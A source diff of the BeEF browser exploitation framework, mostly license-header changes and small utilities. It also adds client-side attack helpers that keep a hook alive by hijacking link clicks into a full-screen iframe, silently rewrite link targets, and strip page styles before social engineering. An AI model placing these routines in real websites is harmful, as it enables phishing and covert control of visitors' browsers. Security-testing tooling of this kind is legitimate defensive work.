 module BeEF
 module API

core/api/module.rb

@@ -1,17 +1,7 @@
 #
-#   Copyright 2012 Wade Alcorn wade@bindshell.net
-#
-#   Licensed under the Apache License, Version 2.0 (the "License");
-#   you may not use this file except in compliance with the License.
-#   You may obtain a copy of the License at
-#
-#       http://www.apache.org/licenses/LICENSE-2.0
-#
-#   Unless required by applicable law or agreed to in writing, software
-#   distributed under the License is distributed on an "AS IS" BASIS,
-#   WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
-#   See the License for the specific language governing permissions and
-#   limitations under the License.
+# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
+# Browser Exploitation Framework (BeEF) - http://beefproject.com
+# See the file 'doc/COPYING' for copying permission
 #
 module BeEF
   module API

core/api/modules.rb

@@ -1,17 +1,7 @@
 #
-#   Copyright 2012 Wade Alcorn wade@bindshell.net
-#
-#   Licensed under the Apache License, Version 2.0 (the "License");
-#   you may not use this file except in compliance with the License.
-#   You may obtain a copy of the License at
-#
-#       http://www.apache.org/licenses/LICENSE-2.0
-#
-#   Unless required by applicable law or agreed to in writing, software
-#   distributed under the License is distributed on an "AS IS" BASIS,
-#   WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
-#   See the License for the specific language governing permissions and
-#   limitations under the License.
+# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
+# Browser Exploitation Framework (BeEF) - http://beefproject.com
+# See the file 'doc/COPYING' for copying permission
 #
 module BeEF
   module API

core/bootstrap.rb

@@ -1,17 +1,7 @@
 #
-#   Copyright 2012 Wade Alcorn wade@bindshell.net
-#
-#   Licensed under the Apache License, Version 2.0 (the "License");
-#   you may not use this file except in compliance with the License.
-#   You may obtain a copy of the License at
-#
-#       http://www.apache.org/licenses/LICENSE-2.0
-#
-#   Unless required by applicable law or agreed to in writing, software
-#   distributed under the License is distributed on an "AS IS" BASIS,
-#   WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
-#   See the License for the specific language governing permissions and
-#   limitations under the License.
+# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
+# Browser Exploitation Framework (BeEF) - http://beefproject.com
+# See the file 'doc/COPYING' for copying permission
 #
 module BeEF
   module Core
@@ -34,6 +24,8 @@ require 'core/main/handlers/browserdetails'
 
 # @note Include the network stack
 require 'core/main/network_stack/handlers/dynamicreconstruction'
+require 'core/main/network_stack/handlers/redirector'
+require 'core/main/network_stack/handlers/raw'
 require 'core/main/network_stack/assethandler'
 require 'core/main/network_stack/api'
 
@@ -50,6 +42,10 @@ require 'core/hbmanager'
 ## @note Include RESTful API
 require 'core/main/rest/handlers/hookedbrowsers'
 require 'core/main/rest/handlers/modules'
+require 'core/main/rest/handlers/categories'
 require 'core/main/rest/handlers/logs'
 require 'core/main/rest/handlers/admin'
 require 'core/main/rest/api'
+
+## @note Include Websocket
+require 'core/main/network_stack/websocket/websocket'

core/core.rb

@@ -1,17 +1,7 @@
 #
-#   Copyright 2012 Wade Alcorn wade@bindshell.net
-#
-#   Licensed under the Apache License, Version 2.0 (the "License");
-#   you may not use this file except in compliance with the License.
-#   You may obtain a copy of the License at
-#
-#       http://www.apache.org/licenses/LICENSE-2.0
-#
-#   Unless required by applicable law or agreed to in writing, software
-#   distributed under the License is distributed on an "AS IS" BASIS,
-#   WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
-#   See the License for the specific language governing permissions and
-#   limitations under the License.
+# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
+# Browser Exploitation Framework (BeEF) - http://beefproject.com
+# See the file 'doc/COPYING' for copying permission
 #
 module BeEF
 module Core
@@ -34,6 +24,7 @@ require 'core/main/constants/browsers'
 require 'core/main/constants/commandmodule'
 require 'core/main/constants/distributedengine'
 require 'core/main/constants/os'
+require 'core/main/constants/hardware'
 
 # @note Include core modules for beef
 require 'core/main/configuration'

core/extension.rb

@@ -1,17 +1,7 @@
 #
-#   Copyright 2012 Wade Alcorn wade@bindshell.net
-#
-#   Licensed under the Apache License, Version 2.0 (the "License");
-#   you may not use this file except in compliance with the License.
-#   You may obtain a copy of the License at
-#
-#       http://www.apache.org/licenses/LICENSE-2.0
-#
-#   Unless required by applicable law or agreed to in writing, software
-#   distributed under the License is distributed on an "AS IS" BASIS,
-#   WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
-#   See the License for the specific language governing permissions and
-#   limitations under the License.
+# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
+# Browser Exploitation Framework (BeEF) - http://beefproject.com
+# See the file 'doc/COPYING' for copying permission
 #
 module BeEF
   module Extension

core/extensions.rb

@@ -1,17 +1,7 @@
 #
-#   Copyright 2012 Wade Alcorn wade@bindshell.net
-#
-#   Licensed under the Apache License, Version 2.0 (the "License");
-#   you may not use this file except in compliance with the License.
-#   You may obtain a copy of the License at
-#
-#       http://www.apache.org/licenses/LICENSE-2.0
-#
-#   Unless required by applicable law or agreed to in writing, software
-#   distributed under the License is distributed on an "AS IS" BASIS,
-#   WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
-#   See the License for the specific language governing permissions and
-#   limitations under the License.
+# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
+# Browser Exploitation Framework (BeEF) - http://beefproject.com
+# See the file 'doc/COPYING' for copying permission
 #
 module BeEF
   module Extensions

core/filters.rb

@@ -1,17 +1,7 @@
 #
-#   Copyright 2012 Wade Alcorn wade@bindshell.net
-#
-#   Licensed under the Apache License, Version 2.0 (the "License");
-#   you may not use this file except in compliance with the License.
-#   You may obtain a copy of the License at
-#
-#       http://www.apache.org/licenses/LICENSE-2.0
-#
-#   Unless required by applicable law or agreed to in writing, software
-#   distributed under the License is distributed on an "AS IS" BASIS,
-#   WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
-#   See the License for the specific language governing permissions and
-#   limitations under the License.
+# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
+# Browser Exploitation Framework (BeEF) - http://beefproject.com
+# See the file 'doc/COPYING' for copying permission
 #
 module BeEF
   module Filters

core/filters/base.rb

@@ -1,17 +1,7 @@
 #
-#   Copyright 2012 Wade Alcorn wade@bindshell.net
-#
-#   Licensed under the Apache License, Version 2.0 (the "License");
-#   you may not use this file except in compliance with the License.
-#   You may obtain a copy of the License at
-#
-#       http://www.apache.org/licenses/LICENSE-2.0
-#
-#   Unless required by applicable law or agreed to in writing, software
-#   distributed under the License is distributed on an "AS IS" BASIS,
-#   WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
-#   See the License for the specific language governing permissions and
-#   limitations under the License.
+# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
+# Browser Exploitation Framework (BeEF) - http://beefproject.com
+# See the file 'doc/COPYING' for copying permission
 #
 module BeEF
 module Filters

core/filters/browser.rb

@@ -1,17 +1,7 @@
 #
-#   Copyright 2012 Wade Alcorn wade@bindshell.net
-#
-#   Licensed under the Apache License, Version 2.0 (the "License");
-#   you may not use this file except in compliance with the License.
-#   You may obtain a copy of the License at
-#
-#       http://www.apache.org/licenses/LICENSE-2.0
-#
-#   Unless required by applicable law or agreed to in writing, software
-#   distributed under the License is distributed on an "AS IS" BASIS,
-#   WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
-#   See the License for the specific language governing permissions and
-#   limitations under the License.
+# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
+# Browser Exploitation Framework (BeEF) - http://beefproject.com
+# See the file 'doc/COPYING' for copying permission
 #
 module BeEF
 module Filters
@@ -47,6 +37,16 @@ module Filters
     true
   end
 
+  # Check the Hardware name value - for example, 'iPhone'
+  # @param [String] str String for testing
+  # @return [Boolean] If the string has valid Hardware name characters
+  def self.is_valid_hwname?(str)
+    return false if not is_non_empty_string?(str)
+    return false if has_non_printable_char?(str)
+    return false if str.length < 2
+    true
+  end
+
   # Verify the browser version string is valid
   # @param [String] str String for testing
   # @return [Boolean] If the string has valid browser version characters
@@ -78,10 +78,10 @@ module Filters
     true
   end
 
-  # Verify the screen params are valid
+  # Verify the screen size is valid
   # @param [String] str String for testing
-  # @return [Boolean] If the string has valid screen param characters
-  def self.is_valid_screen_params?(str)
+  # @return [Boolean] If the string has valid screen size characters
+  def self.is_valid_screen_size?(str)
     return false if has_non_printable_char?(str)    
     return false if str.length > 200
     true
@@ -105,6 +105,15 @@ module Filters
     true
   end
 
+  # Verify the date stamp is valid
+  # @param [String] str String for testing
+  # @return [Boolean] If the string has valid date stamp characters
+  def self.is_valid_date_stamp?(str)
+    return false if has_non_printable_char?(str)
+    return false if str.length > 200
+    true
+  end
+
   # Verify the browser_plugins string is valid
   # @param [String] str String for testing
   # @return [Boolean] If the string has valid browser plugin characters

core/filters/command.rb

@@ -1,17 +1,7 @@
 #
-#   Copyright 2012 Wade Alcorn wade@bindshell.net
-#
-#   Licensed under the Apache License, Version 2.0 (the "License");
-#   you may not use this file except in compliance with the License.
-#   You may obtain a copy of the License at
-#
-#       http://www.apache.org/licenses/LICENSE-2.0
-#
-#   Unless required by applicable law or agreed to in writing, software
-#   distributed under the License is distributed on an "AS IS" BASIS,
-#   WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
-#   See the License for the specific language governing permissions and
-#   limitations under the License.
+# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
+# Browser Exploitation Framework (BeEF) - http://beefproject.com
+# See the file 'doc/COPYING' for copying permission
 #
 module BeEF
 module Filters

core/filters/http.rb

@@ -1,17 +1,7 @@
 #
-#   Copyright 2012 Wade Alcorn wade@bindshell.net
-#
-#   Licensed under the Apache License, Version 2.0 (the "License");
-#   you may not use this file except in compliance with the License.
-#   You may obtain a copy of the License at
-#
-#       http://www.apache.org/licenses/LICENSE-2.0
-#
-#   Unless required by applicable law or agreed to in writing, software
-#   distributed under the License is distributed on an "AS IS" BASIS,
-#   WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
-#   See the License for the specific language governing permissions and
-#   limitations under the License.
+# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
+# Browser Exploitation Framework (BeEF) - http://beefproject.com
+# See the file 'doc/COPYING' for copying permission
 #
 module BeEF  
 module Filters

core/filters/page.rb

@@ -1,17 +1,7 @@
 #
-#   Copyright 2012 Wade Alcorn wade@bindshell.net
-#
-#   Licensed under the Apache License, Version 2.0 (the "License");
-#   you may not use this file except in compliance with the License.
-#   You may obtain a copy of the License at
-#
-#       http://www.apache.org/licenses/LICENSE-2.0
-#
-#   Unless required by applicable law or agreed to in writing, software
-#   distributed under the License is distributed on an "AS IS" BASIS,
-#   WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
-#   See the License for the specific language governing permissions and
-#   limitations under the License.
+# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
+# Browser Exploitation Framework (BeEF) - http://beefproject.com
+# See the file 'doc/COPYING' for copying permission
 #
 module BeEF
 module Filters

core/hbmanager.rb

@@ -1,17 +1,7 @@
 #
-#   Copyright 2012 Wade Alcorn wade@bindshell.net
-#
-#   Licensed under the Apache License, Version 2.0 (the "License");
-#   you may not use this file except in compliance with the License.
-#   You may obtain a copy of the License at
-#
-#       http://www.apache.org/licenses/LICENSE-2.0
-#
-#   Unless required by applicable law or agreed to in writing, software
-#   distributed under the License is distributed on an "AS IS" BASIS,
-#   WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
-#   See the License for the specific language governing permissions and
-#   limitations under the License.
+# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
+# Browser Exploitation Framework (BeEF) - http://beefproject.com
+# See the file 'doc/COPYING' for copying permission
 #
 module BeEF
   module HBManager

core/loader.rb

@@ -1,17 +1,8 @@
 #
-#   Copyright 2012 Wade Alcorn wade@bindshell.net
+# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
+# Browser Exploitation Framework (BeEF) - http://beefproject.com
+# See the file 'doc/COPYING' for copying permission
 #
-#   Licensed under the Apache License, Version 2.0 (the "License");
-#   you may not use this file except in compliance with the License.
-#   You may obtain a copy of the License at
-#
-#       http://www.apache.org/licenses/LICENSE-2.0
-#
-#   Unless required by applicable law or agreed to in writing, software
-#   distributed under the License is distributed on an "AS IS" BASIS,
-#   WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
-#   See the License for the specific language governing permissions and
-#   limitations under the License.
 
 # @note Include here all the gems we are using
 require 'rubygems'

core/main/client/are.js

@@ -0,0 +1,47 @@
+//
+// Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
+// Browser Exploitation Framework (BeEF) - http://beefproject.com
+// See the file 'doc/COPYING' for copying permission
+//
+
+beef.are = {
+  init:function(){
+   var Jools = require('jools');
+   this.ruleEngine = new Jools();
+  },
+  send:function(module){
+    // there will probably be some other stuff here before things are finished
+    this.commands.push(module);
+  },
+  execute:function(inputs){
+    this.rulesEngine.execute(input);
+  },
+  cache_modules:function(modules){},
+  rules:[
+    {
+      'name':"exec_no_input",
+      'condition':function(command,browser){
+          //need to figure out how to handle the inputs
+          return (!command['inputs'] || command['inputs'].length == 0)
+       },
+      'consequence':function(command,browser){}
+    },
+    {
+      'name':"module_has_sibling",
+      'condition':function(command,commands){
+        return false;
+      },
+      'consequence':function(command,commands){}
+    },
+    {
+      'name':"module_depends_on_module",
+      'condition':function(command,commands){
+        return false;
+      },
+      'consequence':function(command,commands){}
+    }
+  ],
+  commands:[],
+  results:[]
+};
+beef.regCmp("beef.are");

core/main/client/beef.js

@@ -1,27 +1,16 @@
 //
-//   Copyright 2012 Wade Alcorn wade@bindshell.net
-//
-//   Licensed under the Apache License, Version 2.0 (the "License");
-//   you may not use this file except in compliance with the License.
-//   You may obtain a copy of the License at
-//
-//       http://www.apache.org/licenses/LICENSE-2.0
-//
-//   Unless required by applicable law or agreed to in writing, software
-//   distributed under the License is distributed on an "AS IS" BASIS,
-//   WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
-//   See the License for the specific language governing permissions and
-//   limitations under the License.
+// Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
+// Browser Exploitation Framework (BeEF) - http://beefproject.com
+// See the file 'doc/COPYING' for copying permission
 //
+
 /*!
  * BeEF JS Library <%= @beef_version %>
- * http://beef.googlecode.com/
+ * Register the BeEF JS on the window object.
  */
 
 $j = jQuery.noConflict();
 
-//<%= @beef_hook_session_name %>='<%= @beef_hook_session_id %>';
-
 if(typeof beef === 'undefined' && typeof window.beef === 'undefined') {
 	
 	var BeefJS = {
@@ -42,15 +31,35 @@ if(typeof beef === 'undefined' && typeof window.beef === 'undefined') {
 		
 		// An array containing all the BeEF JS components.
 		components: new Array(),
-		
+
+                /**
+                 * Adds a function to display debug messages (wraps console.log())
+                 * @param: {string} the debug string to return
+                 */
+                debug: function(msg) {
+                    if (!<%= @client_debug %>) return;
+                    if (typeof console == "object" && typeof console.log == "function") {
+                        console.log(msg);
+                    } else {
+                        // TODO: maybe add a callback to BeEF server for debugging purposes
+                        //window.alert(msg);
+                    }
+                },
+
 		/**
 		 * Adds a function to execute.
 		 * @param: {Function} the function to execute.
 		 */
 		execute: function(fn) {
-			this.commands.push(fn);
-		},
-		
+            if ( typeof  beef.websocket == "undefined"){
+                 this.commands.push(fn);
+            }else{
+                fn();
+            }
+        },
+
+
+
 		/**
 		 * Registers a component in BeEF JS.
 		 * @params: {String} the component.

core/main/client/browser/cookie.js

@@ -1,110 +1,101 @@
-//
-//   Copyright 2012 Wade Alcorn wade@bindshell.net
-//
-//   Licensed under the Apache License, Version 2.0 (the "License");
-//   you may not use this file except in compliance with the License.
-//   You may obtain a copy of the License at
-//
-//       http://www.apache.org/licenses/LICENSE-2.0
-//
-//   Unless required by applicable law or agreed to in writing, software
-//   distributed under the License is distributed on an "AS IS" BASIS,
-//   WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
-//   See the License for the specific language governing permissions and
-//   limitations under the License.
-//
-/*!
- * @literal object: beef.browser.cookie
- * 
- * Provides fuctions for working with cookies. 
- * Several functions adopted from http://techpatterns.com/downloads/javascript_cookies.php
- * Original author unknown.
- * 
- */
-beef.browser.cookie = {
-	
-		setCookie: function (name, value, expires, path, domain, secure) 
-		{
-	
-			var today = new Date();
-			today.setTime( today.getTime() );
-	
-			if ( expires )
-			{
-				expires = expires * 1000 * 60 * 60 * 24;
-			}
-			var expires_date = new Date( today.getTime() + (expires) );
-	
-			document.cookie = name + "=" +escape( value ) +
-				( ( expires ) ? ";expires=" + expires_date.toGMTString() : "" ) +
-				( ( path ) ? ";path=" + path : "" ) +
-				( ( domain ) ? ";domain=" + domain : "" ) +
-				( ( secure ) ? ";secure" : "" );
-		},
-
-		getCookie: function(name) 
-		{
-			var a_all_cookies = document.cookie.split( ';' );
-			var a_temp_cookie = '';
-			var cookie_name = '';
-			var cookie_value = '';
-			var b_cookie_found = false;
-			
-			for ( i = 0; i < a_all_cookies.length; i++ )
-			{
-				a_temp_cookie = a_all_cookies[i].split( '=' );
-				cookie_name = a_temp_cookie[0].replace(/^\s+|\s+$/g, '');
-				if ( cookie_name == name )
-				{
-					b_cookie_found = true;
-					if ( a_temp_cookie.length > 1 )
-					{
-						cookie_value = unescape( a_temp_cookie[1].replace(/^\s+|\s+$/g, '') );
-					}
-					return cookie_value;
-					break;
-				}
-				a_temp_cookie = null;
-				cookie_name = '';
-			}
-			if ( !b_cookie_found )
-			{
-				return null;
-			}
-		},
-
-		deleteCookie: function (name, path, domain) 
-		{
-			if ( this.getCookie(name) ) document.cookie = name + "=" +
-			( ( path ) ? ";path=" + path : "") +
-			( ( domain ) ? ";domain=" + domain : "" ) +
-			";expires=Thu, 01-Jan-1970 00:00:01 GMT";
-		},
-		
-		hasSessionCookies: function (name)
-		{
-			var name = name || "cookie";
-			if (name == "") name = "cookie";
-			this.setCookie( name, 'none', '', '/', '', '' );
-
-			cookiesEnabled = (this.getCookie(name) == null)? false:true;
-			this.deleteCookie(name, '/', '');
-			return cookiesEnabled;
-			
-		},
-
-		hasPersistentCookies: function (name)
-		{
-			var name = name || "cookie";
-			if (name == "") name = "cookie";
-			this.setCookie( name, 'none', 1, '/', '', '' );
-
-			cookiesEnabled = (this.getCookie(name) == null)? false:true;
-			this.deleteCookie(name, '/', '');
-			return cookiesEnabled;
-			
-		}	
-					
-};
-
+//
+// Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
+// Browser Exploitation Framework (BeEF) - http://beefproject.com
+// See the file 'doc/COPYING' for copying permission
+//
+
+/*!
+ * @literal object: beef.browser.cookie
+ * 
+ * Provides fuctions for working with cookies. 
+ * Several functions adopted from http://techpatterns.com/downloads/javascript_cookies.php
+ * Original author unknown.
+ * 
+ */
+beef.browser.cookie = {
+	
+		setCookie: function (name, value, expires, path, domain, secure) 
+		{
+	
+			var today = new Date();
+			today.setTime( today.getTime() );
+	
+			if ( expires )
+			{
+				expires = expires * 1000 * 60 * 60 * 24;
+			}
+			var expires_date = new Date( today.getTime() + (expires) );
+	
+			document.cookie = name + "=" +escape( value ) +
+				( ( expires ) ? ";expires=" + expires_date.toGMTString() : "" ) +
+				( ( path ) ? ";path=" + path : "" ) +
+				( ( domain ) ? ";domain=" + domain : "" ) +
+				( ( secure ) ? ";secure" : "" );
+		},
+
+		getCookie: function(name) 
+		{
+			var a_all_cookies = document.cookie.split( ';' );
+			var a_temp_cookie = '';
+			var cookie_name = '';
+			var cookie_value = '';
+			var b_cookie_found = false;
+			
+			for ( i = 0; i < a_all_cookies.length; i++ )
+			{
+				a_temp_cookie = a_all_cookies[i].split( '=' );
+				cookie_name = a_temp_cookie[0].replace(/^\s+|\s+$/g, '');
+				if ( cookie_name == name )
+				{
+					b_cookie_found = true;
+					if ( a_temp_cookie.length > 1 )
+					{
+						cookie_value = unescape( a_temp_cookie[1].replace(/^\s+|\s+$/g, '') );
+					}
+					return cookie_value;
+					break;
+				}
+				a_temp_cookie = null;
+				cookie_name = '';
+			}
+			if ( !b_cookie_found )
+			{
+				return null;
+			}
+		},
+
+		deleteCookie: function (name, path, domain) 
+		{
+			if ( this.getCookie(name) ) document.cookie = name + "=" +
+			( ( path ) ? ";path=" + path : "") +
+			( ( domain ) ? ";domain=" + domain : "" ) +
+			";expires=Thu, 01-Jan-1970 00:00:01 GMT";
+		},
+		
+		hasSessionCookies: function (name)
+		{
+			var name = name || "cookie";
+			if (name == "") name = "cookie";
+			this.setCookie( name, 'none', '', '/', '', '' );
+
+			cookiesEnabled = (this.getCookie(name) == null)? false:true;
+			this.deleteCookie(name, '/', '');
+			return cookiesEnabled;
+			
+		},
+
+		hasPersistentCookies: function (name)
+		{
+			var name = name || "cookie";
+			if (name == "") name = "cookie";
+			this.setCookie( name, 'none', 1, '/', '', '' );
+
+			cookiesEnabled = (this.getCookie(name) == null)? false:true;
+			this.deleteCookie(name, '/', '');
+			return cookiesEnabled;
+			
+		}	
+					
+};
+
 beef.regCmp('beef.browser.cookie');

core/main/client/browser/popup.js

@@ -1,39 +1,30 @@
-//
-//   Copyright 2012 Wade Alcorn wade@bindshell.net
-//
-//   Licensed under the Apache License, Version 2.0 (the "License");
-//   you may not use this file except in compliance with the License.
-//   You may obtain a copy of the License at
-//
-//       http://www.apache.org/licenses/LICENSE-2.0
-//
-//   Unless required by applicable law or agreed to in writing, software
-//   distributed under the License is distributed on an "AS IS" BASIS,
-//   WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
-//   See the License for the specific language governing permissions and
-//   limitations under the License.
-//
-/*!
- * @literal object: beef.browser.popup
- * 
- * Provides fuctions for working with cookies. 
- * Several functions adopted from http://davidwalsh.name/popup-block-javascript
- * Original author unknown.
- * 
- */
-beef.browser.popup = {
-	
-		blocker_enbabled: function ()
-		{
-			screenParams = beef.browser.getScreenParams();
-			var popUp = window.open('/', 'windowName0', 'width=1, height=1, left='+screenParams.width+', top='+screenParams.height+', scrollbars, resizable');
-			if (popUp == null || typeof(popUp)=='undefined') {   
-			  	return true;
-			} else {   
-				popUp.close();
-				return false;
-			}
-		}
-};
-
-beef.regCmp('beef.browser.popup');
+//
+// Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
+// Browser Exploitation Framework (BeEF) - http://beefproject.com
+// See the file 'doc/COPYING' for copying permission
+//
+
+/*!
+ * @literal object: beef.browser.popup
+ * 
+ * Provides fuctions for working with cookies. 
+ * Several functions adopted from http://davidwalsh.name/popup-block-javascript
+ * Original author unknown.
+ * 
+ */
+beef.browser.popup = {
+	
+		blocker_enabled: function ()
+		{
+			screenParams = beef.browser.getScreenSize();
+			var popUp = window.open('/', 'windowName0', 'width=1, height=1, left='+screenParams.width+', top='+screenParams.height+', scrollbars, resizable');
+			if (popUp == null || typeof(popUp)=='undefined') {   
+			  	return true;
+			} else {   
+				popUp.close();
+				return false;
+			}
+		}
+};
+
+beef.regCmp('beef.browser.popup');

core/main/client/dom.js

@@ -1,18 +1,9 @@
 //
-//   Copyright 2012 Wade Alcorn wade@bindshell.net
-//
-//   Licensed under the Apache License, Version 2.0 (the "License");
-//   you may not use this file except in compliance with the License.
-//   You may obtain a copy of the License at
-//
-//       http://www.apache.org/licenses/LICENSE-2.0
-//
-//   Unless required by applicable law or agreed to in writing, software
-//   distributed under the License is distributed on an "AS IS" BASIS,
-//   WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
-//   See the License for the specific language governing permissions and
-//   limitations under the License.
+// Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
+// Browser Exploitation Framework (BeEF) - http://beefproject.com
+// See the file 'doc/COPYING' for copying permission
 //
+
 /*!
  * @literal object: beef.dom
  *
@@ -85,6 +76,30 @@ beef.dom = {
 		
 		return iframe;
 	},
+
+	/**
+	 * Returns the highest current z-index
+	 * @param: {Boolean} whether to return an associative array with the height AND the ID of the element
+	 * @return: {Integer} Highest z-index in the DOM
+	 * OR
+	 * @return: {Hash} A hash with the height and the ID of the highest element in the DOM {'height': INT, 'elem': STRING}
+	 */
+	getHighestZindex: function(include_id) {
+		var highest = {'height':0, 'elem':''};
+		$j('*').each(function() {
+			var current_high = parseInt($j(this).css("zIndex"),10);
+			if (current_high > highest.height) {
+				highest.height = current_high;
+				highest.elem = $j(this).attr('id');
+			}
+		});
+
+		if (include_id) {
+			return highest;
+		} else {
+			return highest.height;
+		}
+	},
 	
 	/**
      * Create and iFrame element. In case it's create with POST method, the iFrame is automatically added to the DOM and submitted.
@@ -104,8 +119,15 @@ beef.dom = {
 			var form_action = params['src'];
 			params['src'] = '';
 		}
-		if (type == 'hidden') { css = $j.extend(true, {'border':'none', 'width':'1px', 'height':'1px', 'display':'none', 'visibility':'hidden'}, styles); }
-		if (type == 'fullscreen') { css = $j.extend(true, {'border':'none', 'background-color':'white', 'width':'100%', 'height':'100%', 'position':'absolute', 'top':'0px', 'left':'0px'}, styles); $j('body').css({'padding':'0px', 'margin':'0px'}); }
+		if (type == 'hidden') {
+			css = $j.extend(true, {'border':'none', 'width':'1px', 'height':'1px', 'display':'none', 'visibility':'hidden'}, styles);
+		} else if (type == 'fullscreen') {
+			css = $j.extend(true, {'border':'none', 'background-color':'white', 'width':'100%', 'height':'100%', 'position':'absolute', 'top':'0px', 'left':'0px', 'z-index':beef.dom.getHighestZindex()+1}, styles);
+			$j('body').css({'padding':'0px', 'margin':'0px'});
+		} else {
+			css = styles;
+			$j('body').css({'padding':'0px', 'margin':'0px'});
+		}
 		var iframe = $j('<iframe />').attr(params).css(css).load(onload).prependTo('body');
 		
 		if (form_submit && form_action)
@@ -117,6 +139,94 @@ beef.dom = {
 		}
 		return iframe;
 	},
+
+    /**
+     * Load the link (href value) in an overlay foreground iFrame.
+     * The BeEF hook continues to run in background.
+     * NOTE: if the target link is returning X-Frame-Options deny/same-origin or uses
+     * Framebusting techniques, this will not work.
+     */
+    persistentIframe: function(){
+        $j('a').click(function(e) {
+            if ($j(this).attr('href') != '')
+            {
+                e.preventDefault();
+                beef.dom.createIframe('fullscreen', 'get', {'src':$j(this).attr('href')}, {}, null);
+                $j(document).attr('title', $j(this).html());
+                document.body.scroll = "no";
+                document.documentElement.style.overflow = 'hidden';
+            }
+        });
+    },
+
+    /**
+     * Load a full screen div that is black, or, transparent
+     * @param: {Boolean} vis: whether or not you want the screen dimmer enabled or not
+     * @param: {Hash} options: a collection of options to customise how the div is configured, as follows:
+     *         opacity:0-100         // Lower number = less grayout higher = more of a blackout
+     *           // By default this is 70 
+     *         zindex: #             // HTML elements with a higher zindex appear on top of the gray out
+     *           // By default this will use beef.dom.getHighestZindex to always go to the top
+     *         bgcolor: (#xxxxxx)    // Standard RGB Hex color code
+     *           // By default this is #000000
+     */
+	grayOut: function(vis, options) {
+	  // in any order.  Pass only the properties you need to set.
+	  var options = options || {};
+	  var zindex = options.zindex || beef.dom.getHighestZindex()+1;
+	  var opacity = options.opacity || 70;
+	  var opaque = (opacity / 100);
+	  var bgcolor = options.bgcolor || '#000000';
+	  var dark=document.getElementById('darkenScreenObject');
+	  if (!dark) {
+	    // The dark layer doesn't exist, it's never been created.  So we'll
+	    // create it here and apply some basic styles.
+	    // If you are getting errors in IE see: http://support.microsoft.com/default.aspx/kb/927917
+	    var tbody = document.getElementsByTagName("body")[0];
+	    var tnode = document.createElement('div');           // Create the layer.
+	        tnode.style.position='absolute';                 // Position absolutely
+	        tnode.style.top='0px';                           // In the top
+	        tnode.style.left='0px';                          // Left corner of the page
+	        tnode.style.overflow='hidden';                   // Try to avoid making scroll bars            
+	        tnode.style.display='none';                      // Start out Hidden
+	        tnode.id='darkenScreenObject';                   // Name it so we can find it later
+	    tbody.appendChild(tnode);                            // Add it to the web page
+	    dark=document.getElementById('darkenScreenObject');  // Get the object.
+	  }
+	  if (vis) {
+	    // Calculate the page width and height 
+	    if( document.body && ( document.body.scrollWidth || document.body.scrollHeight ) ) {
+	        var pageWidth = document.body.scrollWidth+'px';
+	        var pageHeight = document.body.scrollHeight+'px';
+	    } else if( document.body.offsetWidth ) {
+	      var pageWidth = document.body.offsetWidth+'px';
+	      var pageHeight = document.body.offsetHeight+'px';
+	    } else {
+	       var pageWidth='100%';
+	       var pageHeight='100%';
+	    }
+	    //set the shader to cover the entire page and make it visible.
+	    dark.style.opacity=opaque;
+	    dark.style.MozOpacity=opaque;
+	    dark.style.filter='alpha(opacity='+opacity+')';
+	    dark.style.zIndex=zindex;
+	    dark.style.backgroundColor=bgcolor;
+	    dark.style.width= pageWidth;
+	    dark.style.height= pageHeight;
+	    dark.style.display='block';
+	  } else {
+	     dark.style.display='none';
+	  }
+	},
+
+	/**
+	 * Remove all external and internal stylesheets from the current page - sometimes prior to socially engineering,
+	 *  or, re-writing a document this is useful.
+	 */
+	removeStylesheets: function() {
+		$j('link[rel=stylesheet]').remove();
+		$j('style').remove();
+	},
 	
 	/**
      * Create a form element with the specified parameters, appending it to the DOM if append == true
@@ -168,6 +278,23 @@ beef.dom = {
 		}).length;
 	},
 
+	/**
+	 * Rewrites all links matched by selector to url, leveraging Bilawal Hameed's hidden click event overwriting.
+	 * http://bilaw.al/2013/03/17/hacking-the-a-tag-in-100-characters.html
+	 * @param: {String} url: the url to be rewritten
+	 * @param: {String} selector: the jquery selector statement to use, defaults to all a tags.
+	 * @return: {Number} the amount of links found in the DOM and rewritten.
+	 */
+	rewriteLinksClickEvents: function(url, selector) {
+		var sel = (selector == null) ? 'a' : selector;
+		return $j(sel).each(function() {
+			if ($j(this).attr('href') != null)
+			{
+				$j(this).click(function() {this.href=url});
+			}
+		}).length;
+	},
+
 	/**
